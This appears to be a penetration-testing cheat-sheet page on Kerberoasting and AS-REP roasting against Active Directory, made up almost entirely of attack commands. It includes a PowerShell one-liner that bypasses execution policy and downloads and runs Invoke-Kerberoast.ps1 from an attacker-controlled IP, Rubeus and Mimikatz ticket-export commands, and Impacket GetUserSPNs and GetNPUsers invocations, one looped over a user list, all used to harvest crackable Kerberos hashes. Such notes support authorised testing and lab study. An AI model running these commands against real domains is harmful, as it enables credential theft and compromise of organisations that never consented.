Roasting

Kerberoasting

https://www.pentestpartners.com/security-blog/how-to-kerberoast-like-a-boss/

From Windows Shell

PowerShell One-Liner

Downloads Invoke-Kerberoast.ps1 from Kali, executes it, and saves output to file for hashcat reversing

powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.49.121/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt"

Rubeus

Get-NetUser -SPN | select cn

Request-SPNTicket

Rubeus.exe kerberoast /format:hashcat > Hash1

Mimikatz

kerberos::ask /target:SPN
kerberos::list /export

No pass or admin required:

kerberos::list
kerberos::list /export

From Kali

No Passwords, Known-Good Users

GetUserSPNs.py $DOMAIN/ -nopass -usersfile users.txt

With Full Creds

GetUserSPNs.py -request -dc-ip $target $domain/username:password

More Kerberos in-depth:

https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a

https://www.youtube.com/watch?v=beRDcvBwTBw

AS-Rep Roasting

More rare than kerberoasting because something has to be set manually, namely the ‘no preauth required’ has to be unchecked on the account, meaning it doesn't need to use kerberos to request

GetNPUsers.py -dc-ip $target domain.com/username:password

or without any password!

GetNPUsers.py -no-pass domain.com/username

Or from a list

for user in $(cat users); do GetNPUsers.py -no-pass -dc-ip $IP domain.local/$user | grep krb5asrep; done

If you've added to hosts file you won't need the IP written explicitly

PreviousPowerShell Domain Enumeration NextMimikatz

Last updated 3 years ago